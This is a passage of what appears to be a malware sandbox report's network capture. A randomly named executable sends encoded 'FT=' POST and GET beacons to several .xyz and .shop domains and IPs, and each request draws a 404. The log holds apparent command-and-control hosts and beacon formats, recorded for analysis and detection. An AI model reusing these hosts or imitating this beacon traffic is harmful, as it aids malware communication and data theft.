7	192.168.2.7	49984	209.74.79.42	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:03.247458935 CET	1795	OUT	POST /iqne/ HTTP/1.1 Host: www.creaturpace.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.creaturpace.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Connection: close Referer: http://www.creaturpace.xyz/iqne/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 59 68 61 72 69 4c 62 52 59 46 38 45 39 41 39 67 6b 43 46 31 35 5a 69 32 54 70 5a 4e 6c 4d 65 32 61 4d 4c 64 6c 4a 62 73 69 43 36 31 49 36 47 52 54 33 72 52 6c 35 43 7a 2b 32 77 48 50 74 41 6d 49 30 79 72 51 71 42 79 57 4e 62 2f 69 48 75 47 4e 69 55 56 53 53 2f 73 79 76 66 75 75 54 4f 47 68 6d 4a 6b 67 77 54 4c 72 76 45 4c 76 55 45 4e 58 4b 6e 33 43 7a 68 4c 66 61 34 69 53 79 71 7a 76 47 6b 70 4b 6e 58 4b 77 45 6c 6d 31 6c 4f 5a 4b 4f 34 7a 43 5a 59 35 6f 61 56 57 72 69 6c 6a 54 4f 44 37 75 51 50 6b 70 2f 47 49 57 72 79 5a 38 49 55 39 78 56 50 59 73 51 44 75 4f 35 6d 5a 2b 65 34 6a 4e 74 38 46 4b 5a 34 56 6a 6b 5a 31 55 70 51 55 63 31 6f 6a 78 50 69 75 77 64 35 50 6d 61 46 52 51 58 68 56 6b 6b 48 61 57 58 71 4e 66 39 6c 6c 51 6c 71 36 75 42 51 46 37 68 70 65 46 34 66 62 75 79 54 6e 54 69 4f 55 35 41 59 30 69 78 4a 4a 76 39 4b 7a 36 4a 36 59 64 46 4e 6e 61 50 5a 58 54 45 35 4c 56 56 77 69 50 4b 2f 65 49 75 74 77 75 6e 33 76 50 2b 30 6f 50 74 69 72 44 61 6e 6c 4b 52 34 59 73 61 35 36 5a 34 65 [TRUNCATED] Data Ascii: FT=YhariLbRYF8E9A9gkCF15Zi2TpZNlMe2aMLdlJbsiC61I6GRT3rRl5Cz+2wHPtAmI0yrQqByWNb/iHuGNiUVSS/syvfuuTOGhmJkgwTLrvELvUENXKn3CzhLfa4iSyqzvGkpKnXKwElm1lOZKO4zCZY5oaVWriljTOD7uQPkp/GIWryZ8IU9xVPYsQDuO5mZ+e4jNt8FKZ4VjkZ1UpQUc1ojxPiuwd5PmaFRQXhVkkHaWXqNf9llQlq6uBQF7hpeF4fbuyTnTiOU5AY0ixJJv9Kz6J6YdFNnaPZXTE5LVVwiPK/eIutwun3vP+0oPtirDanlKR4Ysa56Z4eb7hC5kTrz7LM1cK8rn3MmRXXUCGawCHqYwwdqJG+bCDgR/G+nU3sOVdX/3T/VcD2D342kABGpe+9jWCnaXNJmNC0Gwx1ygPsz4zNvr3bES3bkG2qe/tr29xXPRztxHT0DkSkdFRhdTiPi/kWrtx7LgwSNlv+3LbyxXxUdOFPcl+yuP9aAlrnnr7/YQdnf8/BIOnRBjOJr0tADH33s5hBgA2gTX9ei8nV3hoRXkIRfLlsEcU6tOJlhTeyNNvSexwWMWBhMlVbKb7cIHe2nSdraGJKqNII0Z1vlKySrUeMxUSac65caXhnM+flxkn+8Qa68Nj04UI79TZhDjWCiLLdp9AhUt8i4UhzLgI2G0YuPHRiu4p26p9V2ewtvzW8CUj1XH4C6JCeucjZSNTLgekrpBI/FhtaeO20DVRbj5caajNOgG8KsyPeFD26dC+l56C9SgWtzpFSnF2SosuvwWtz+FjM3V7g+a2+J+hU/5vLQM36q/3VPk75xXmBerMEaXk50+EpPw0X2GqkldUZ0/t05M68N2PCvVM8hz78/Lo+pJ1qL0+TeLNT11JPKXOBZf8WUlgkjjBkkLPWQIGTOf+infdXdebOj2whcEZfUnAdeuMds+QgSPQXxzADz3vACtOkQs2nKXx4+Ll/kk5O5xsTx5F+j3MRAN1W2Y [TRUNCATED]
Jan 11, 2025 05:05:03.815442085 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:05:03 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49985	209.74.79.42	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:05.834855080 CET	493	OUT	GET /iqne/?FT=VjyLh8/TQUU29ht9sglv6JaML71ZquykbcLw6LPhnWCKA7K1Zlfytdmm6EghNtNIJzDGRbJ4b+Pf1nzjNE47Qwrk29fp3z3J9k0CszfKgPRR/UIQYMjTRi1CBqkwXRex3HM9PnLmwRgb&LZXLP=uRtDln HTTP/1.1 Host: www.creaturpace.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Jan 11, 2025 05:05:06.417193890 CET	548	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:05:06 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49986	45.113.82.65	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:11.937406063 CET	750	OUT	POST /avm2/ HTTP/1.1 Host: www.biumini.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.biumini.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Connection: close Referer: http://www.biumini.xyz/avm2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 33 64 4e 76 31 35 34 6e 6b 4a 61 46 6a 37 68 56 54 4d 71 35 6a 49 45 6b 61 36 56 74 6c 79 52 6c 77 41 30 78 30 61 6c 62 34 75 32 6b 58 78 66 4f 58 37 56 38 4f 47 4a 6f 66 31 33 52 36 66 31 44 57 71 36 6c 53 6e 76 62 54 44 64 30 68 55 4e 4b 74 63 2b 56 46 55 7a 41 67 32 54 64 51 47 37 65 51 62 42 65 45 71 33 46 4a 51 36 58 57 4d 57 4a 54 32 57 75 51 47 44 51 6f 6f 75 6a 68 47 35 62 61 66 69 48 37 48 47 49 43 6d 51 41 55 2f 56 36 6e 30 34 56 31 79 5a 2b 58 6b 77 70 5a 6e 43 43 68 4d 31 34 56 52 46 4d 47 6b 45 72 72 6b 6c 75 53 6b 35 76 45 73 4d 47 36 78 44 33 46 38 66 52 70 57 67 67 33 37 41 77 54 57 39 67 78 66 74 4f 66 41 3d 3d Data Ascii: FT=3dNv154nkJaFj7hVTMq5jIEka6VtlyRlwA0x0alb4u2kXxfOX7V8OGJof13R6f1DWq6lSnvbTDd0hUNKtc+VFUzAg2TdQG7eQbBeEq3FJQ6XWMWJT2WuQGDQooujhG5bafiH7HGICmQAU/V6n04V1yZ+XkwpZnCChM14VRFMGkErrkluSk5vEsMG6xD3F8fRpWgg37AwTW9gxftOfA==
Jan 11, 2025 05:05:13.082554102 CET	306	IN	HTTP/1.1 404 Not Found Content-Length: 146 Content-Type: text/html Date: Sat, 11 Jan 2025 04:05:12 GMT Server: nginx X-Cache: BYPASS Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49987	45.113.82.65	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:14.481859922 CET	770	OUT	POST /avm2/ HTTP/1.1 Host: www.biumini.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.biumini.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Connection: close Referer: http://www.biumini.xyz/avm2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 33 64 4e 76 31 35 34 6e 6b 4a 61 46 6a 61 52 56 55 74 71 35 72 49 45 6e 51 61 56 74 72 53 52 68 77 41 34 78 30 59 4a 31 35 59 47 6b 58 52 50 4f 46 75 68 38 4a 47 4a 6f 52 56 33 4a 6b 76 31 4b 57 71 47 74 53 6d 54 62 54 44 4a 30 68 57 46 4b 71 72 71 57 45 45 7a 47 73 57 54 66 4e 32 37 65 51 62 42 65 45 70 4c 6a 4a 51 79 58 56 2f 65 4a 53 55 79 76 54 47 44 58 34 59 75 6a 6c 47 35 68 61 66 69 78 37 46 69 79 43 6b 59 41 55 37 5a 36 6b 68 55 53 37 79 5a 34 59 45 78 63 65 57 7a 48 6e 38 31 6c 55 53 74 43 4f 6b 4a 4f 75 53 6b 4d 49 47 31 44 61 39 30 39 2b 7a 6e 42 53 61 43 6b 72 58 6b 34 36 5a 30 52 4d 68 59 4b 38 4e 4d 4b 4a 77 46 34 6b 49 77 64 71 2f 77 35 31 66 65 33 63 59 58 51 59 51 59 3d Data Ascii: FT=3dNv154nkJaFjaRVUtq5rIEnQaVtrSRhwA4x0YJ15YGkXRPOFuh8JGJoRV3Jkv1KWqGtSmTbTDJ0hWFKqrqWEEzGsWTfN27eQbBeEpLjJQyXV/eJSUyvTGDX4YujlG5hafix7FiyCkYAU7Z6khUS7yZ4YExceWzHn81lUStCOkJOuSkMIG1Da909+znBSaCkrXk46Z0RMhYK8NMKJwF4kIwdq/w51fe3cYXQYQY=
Jan 11, 2025 05:05:15.615912914 CET	306	IN	HTTP/1.1 404 Not Found Content-Length: 146 Content-Type: text/html Date: Sat, 11 Jan 2025 04:05:15 GMT Server: nginx X-Cache: BYPASS Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49988	45.113.82.65	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:17.047185898 CET	1783	OUT	POST /avm2/ HTTP/1.1 Host: www.biumini.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.biumini.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Connection: close Referer: http://www.biumini.xyz/avm2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 33 64 4e 76 31 35 34 6e 6b 4a 61 46 6a 61 52 56 55 74 71 35 72 49 45 6e 51 61 56 74 72 53 52 68 77 41 34 78 30 59 4a 31 35 59 4f 6b 58 6a 33 4f 58 64 35 38 49 47 4a 6f 5a 31 33 64 6b 76 30 61 57 75 53 70 53 6d 66 74 54 42 78 30 67 7a 4a 4b 72 61 71 57 4c 45 7a 47 78 6d 54 65 51 47 36 45 51 62 52 61 45 71 7a 6a 4a 51 79 58 56 35 36 4a 47 32 57 76 56 47 44 51 6f 6f 75 2f 68 47 34 76 61 66 4b 68 37 46 32 69 42 58 41 41 61 2f 31 36 6d 58 41 53 33 79 5a 36 64 45 78 45 65 57 2f 4d 6e 38 5a 44 55 53 6f 58 4f 6a 4e 4f 76 32 68 68 51 56 4a 31 5a 4f 45 6f 34 53 37 45 64 37 79 4a 73 6b 30 6a 6c 65 59 75 4a 69 49 32 38 64 78 43 41 48 45 59 6b 35 4d 6a 6d 4e 6c 72 6c 49 2f 4f 46 62 58 33 4f 33 6c 4c 53 6f 77 57 39 38 54 71 36 72 41 4a 4d 35 42 6e 68 71 43 77 2f 75 49 4e 62 58 72 2f 6e 74 39 44 35 50 45 44 75 6b 36 4c 6b 46 50 76 72 38 2b 69 47 38 47 4b 78 43 37 62 67 6f 4f 36 4b 78 70 66 68 43 59 64 51 2f 4b 4f 52 2f 72 46 69 6f 36 5a 65 45 33 6e 50 56 6f 6a 54 31 71 47 36 67 65 6a 30 58 57 44 56 74 76 [TRUNCATED] Data Ascii: FT=3dNv154nkJaFjaRVUtq5rIEnQaVtrSRhwA4x0YJ15YOkXj3OXd58IGJoZ13dkv0aWuSpSmftTBx0gzJKraqWLEzGxmTeQG6EQbRaEqzjJQyXV56JG2WvVGDQoou/hG4vafKh7F2iBXAAa/16mXAS3yZ6dExEeW/Mn8ZDUSoXOjNOv2hhQVJ1ZOEo4S7Ed7yJsk0jleYuJiI28dxCAHEYk5MjmNlrlI/OFbX3O3lLSowW98Tq6rAJM5BnhqCw/uINbXr/nt9D5PEDuk6LkFPvr8+iG8GKxC7bgoO6KxpfhCYdQ/KOR/rFio6ZeE3nPVojT1qG6gej0XWDVtvu7QVhxPbFB84cTL1SEDWlLibthab9Di0be5hnzxIEgehR/8KoVJW9Jf5LNXMkurMVsZqvFUWhhx3TZ/ZFJ9Jk1m1Yv4eYwJVgWPQV+LZNFCX6618uJoAFZLPIaOfs7mUQ9Vk63GhKUwM6o3TWN//ANBseNCpG4c6BJWvga4eUJh64ykseTgocwL4gGHfvxMuBkuTrLfJ7EL633Di2d7+4c4NkCCya1zYiaGqiydwLh7JLzncaAqglGcN4vA4Kl0JWghtpMWGCNiKtqOCeEoQJoALZue148Y2tQnBga8hHIV0DAvLX25MohpZCQ2b0R5K1S6gy8CSppFQJhk2Yz/iwpdMLvMDjU3xqxRCkDRIMYCOLBV3FCgfVA8dXRIab+Iuop7FUAnNIVHkcGRSMTzpY3/xa/fOBjdOZSDtYyNw56BpH0w6V36J4GgKkDNaTSGC8Bx98WhCnbvgaaElptG+SiW/tLETrOZtc0WvL0bHZzEiv2gJcyU4h4BMBOuQCnXJSg5s760qqfBA5OwoFIwTdz0Lvv+hWFE4w5HYF0tWlHCmEIcefaLGNM64Is68Gn4Hi1Fhru0cS6OCu7dhSXJr5hkXCaTp2SN0YFTpc6mMsfoRv2aW/rVdh8/fyDP2xsfmQnBIzlYlzJ4wys76eRwaF/ESniy0QB1OwM [TRUNCATED]
Jan 11, 2025 05:05:18.191391945 CET	306	IN	HTTP/1.1 404 Not Found Content-Length: 146 Content-Type: text/html Date: Sat, 11 Jan 2025 04:05:17 GMT Server: nginx X-Cache: BYPASS Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49989	45.113.82.65	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:19.586208105 CET	489	OUT	GET /avm2/?FT=6flP2NBanoj1mJhTT9CcmrsvLKpegCBIyTYKy6cM/MLUWAXAJvJCIjNuYRuuhMslcuSeXmXhbRN15WMnyNK6Lzjzu1vwOU2WN5AiA5/FDSnJY+GQW2n8GmjYxtSliihue8e28SerNnoc&LZXLP=uRtDln HTTP/1.1 Host: www.biumini.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Jan 11, 2025 05:05:20.713006973 CET	306	IN	HTTP/1.1 404 Not Found Content-Length: 146 Content-Type: text/html Date: Sat, 11 Jan 2025 04:05:20 GMT Server: nginx X-Cache: BYPASS Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49990	67.223.118.94	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:25.764002085 CET	756	OUT	POST /slmn/ HTTP/1.1 Host: www.rtpbnmax.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.rtpbnmax.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Connection: close Referer: http://www.rtpbnmax.shop/slmn/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 69 7a 35 49 38 39 69 49 30 4c 47 43 47 72 7a 6e 54 76 6e 36 77 50 54 42 2b 6e 57 63 39 4c 6b 5a 63 39 4e 30 38 69 74 43 4d 67 71 5a 6c 71 32 41 70 53 45 4f 62 67 71 4c 37 43 33 43 4f 6a 74 47 39 7a 62 64 44 70 2b 37 77 4c 4f 35 51 67 6b 31 44 44 51 64 50 70 5a 34 71 69 6f 67 37 57 4e 78 37 4c 6e 7a 78 56 41 45 52 70 69 76 43 51 6f 38 42 46 2f 55 73 38 74 43 75 56 53 33 4e 56 50 61 53 71 6f 54 58 65 6c 46 5a 62 69 6a 76 47 34 68 2f 56 78 6c 37 2f 77 38 2f 45 6d 61 61 57 42 74 2b 79 54 33 4a 63 51 52 4f 6b 51 4b 64 6d 34 49 4a 6e 36 73 7a 4b 37 38 46 50 52 32 50 6f 51 4d 77 55 35 72 7a 4c 78 4e 34 68 66 55 37 47 66 47 76 41 3d 3d Data Ascii: FT=iz5I89iI0LGCGrznTvn6wPTB+nWc9LkZc9N08itCMgqZlq2ApSEObgqL7C3COjtG9zbdDp+7wLO5Qgk1DDQdPpZ4qiog7WNx7LnzxVAERpivCQo8BF/Us8tCuVS3NVPaSqoTXelFZbijvG4h/Vxl7/w8/EmaaWBt+yT3JcQROkQKdm4IJn6szK78FPR2PoQMwU5rzLxN4hfU7GfGvA==
Jan 11, 2025 05:05:26.350210905 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 04:05:26 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
